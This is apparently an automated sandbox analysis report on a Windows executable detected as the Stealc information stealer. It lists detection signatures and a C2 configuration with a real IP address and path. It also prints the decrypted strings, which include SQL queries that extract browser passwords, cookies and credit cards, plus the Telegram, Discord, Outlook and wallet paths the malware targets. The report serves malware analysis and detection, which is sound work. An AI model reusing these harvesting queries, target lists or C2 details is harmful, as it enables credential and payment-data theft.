
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1546463
MD5: 0851a659097fb0251ff585c552f6673d
SHA1: b3f95ea7672be4a71e2c5c6b19efd44b26d9d757
SHA256: 045bfda1e383466d58bfe5dec775188ff592de16671dc6da7bf9c8fadba3ccba
Tags: exe user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7116 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0851A659097FB0251FF585C552F6673D)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1763680233.000000000145E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000003.1722686699.00000000050E0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1763025925.00000000006B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 7116 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 7116 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Source | Rule | Description | Author | Strings
0.2.file.exe.6b0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-31T23:47:05.311987+0100 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP



AV Detection

Source: file.exe | Avira: detected
Source: 0.2.file.exe.6b0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: 30
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: 11
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: 20
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: 24
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetProcAddress
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: LoadLibraryA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: lstrcatA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: OpenEventA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CreateEventA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CloseHandle
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Sleep
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: VirtualFree
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetSystemInfo
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: VirtualAlloc
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: HeapAlloc
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetComputerNameA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: lstrcpyA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetProcessHeap
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetCurrentProcess
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: lstrlenA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ExitProcess
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetSystemTime
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: advapi32.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: gdi32.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: user32.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: crypt32.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ntdll.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetUserNameA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CreateDCA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetDeviceCaps
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ReleaseDC
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sscanf
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: VMwareVMware
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: HAL9TH
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: JohnDoe
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: DISPLAY
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: http://185.215.113.206
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: bksvnsj
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: /6c4adf523b719729.php
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: /746f34465cf17784/
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: tale
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetFileAttributesA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GlobalLock
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: HeapFree
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetFileSize
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GlobalSize
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: IsWow64Process
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Process32Next
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetLocalTime
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: FreeLibrary
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Process32First
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: DeleteFileA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: FindNextFileA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: LocalFree
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: FindClose
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: LocalAlloc
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetFileSizeEx
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ReadFile
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SetFilePointer
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: WriteFile
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CreateFileA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: FindFirstFileA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CopyFileA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: VirtualProtect
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetLastError
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: lstrcpynA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GlobalFree
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GlobalAlloc
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: OpenProcess
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: TerminateProcess
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: gdiplus.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ole32.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: bcrypt.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: wininet.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: shlwapi.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: shell32.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: psapi.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SelectObject
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: BitBlt
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: DeleteObject
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GdiplusStartup
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GdiplusShutdown
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GdipDisposeImage
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GdipFree
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CoUninitialize
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CoInitialize
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CoCreateInstance
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: BCryptDecrypt
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: BCryptSetProperty
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetWindowRect
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetDesktopWindow
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetDC
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CloseWindow
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: wsprintfA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CharToOemW
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: wsprintfW
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RegQueryValueExA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RegCloseKey
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RegEnumValueA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CryptUnprotectData
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ShellExecuteExA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: InternetConnectA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: InternetCloseHandle
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: InternetOpenA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: HttpSendRequestA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: InternetReadFile
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: StrCmpCA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: StrStrA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: StrCmpCW
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: PathMatchSpecA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RmStartSession
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RmRegisterResources
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RmGetList
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: RmEndSession
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sqlite3_open
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sqlite3_step
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sqlite3_column_text
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sqlite3_finalize
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sqlite3_close
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: encrypted_key
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: PATH
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: NSS_Init
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: NSS_Shutdown
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: PK11_Authenticate
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: C:\ProgramData\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: browser:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: profile:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: url:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: login:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: password:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Opera
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: OperaGX
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Network
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: cookies
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: .txt
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: TRUE
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: FALSE
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: autofill
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: history
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: cc
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: name:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: month:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: year:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: card:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Cookies
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Login Data
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Web Data
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: History
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: logins.json
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: formSubmitURL
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: usernameField
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: encryptedUsername
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: encryptedPassword
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: guid
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: cookies.sqlite
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: formhistory.sqlite
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: places.sqlite
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: plugins
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Local Extension Settings
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Sync Extension Settings
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: IndexedDB
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Opera Stable
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Opera GX Stable
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: CURRENT
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: chrome-extension_
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Local State
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: profiles.ini
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: chrome
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: opera
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: firefox
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: wallets
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ProductName
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: x32
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: x64
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: ProcessorNameString
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: DisplayName
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: DisplayVersion
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Network Info:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - IP: IP?
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Country: ISO?
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: System Summary:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - HWID:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - OS:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Architecture:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - UserName:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Computer Name:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Local Time:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - UTC:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Language:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Keyboards:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Laptop:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Running Path:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - CPU:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Threads:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Cores:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - RAM:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - Display Resolution:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: - GPU:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: User Agents:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Installed Apps:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: All Users:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Current User:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Process List:
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: system_info.txt
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: freebl3.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: mozglue.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: msvcp140.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: nss3.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: softokn3.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: vcruntime140.dll
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: \Temp\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: .exe
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: runas
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: open
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: /c start
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %DESKTOP%
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %APPDATA%
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %USERPROFILE%
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: %RECENT%
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: *.lnk
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: files
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: \discord\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: key_datas
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: map*
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Telegram
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Tox
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: *.tox
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: *.ini
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Password
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: 00000001
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: 00000002
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: 00000003
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: 00000004
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: Pidgin
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: \.purple\
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: accounts.xml
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.6b0000.0.unpack | String decryptor: token:
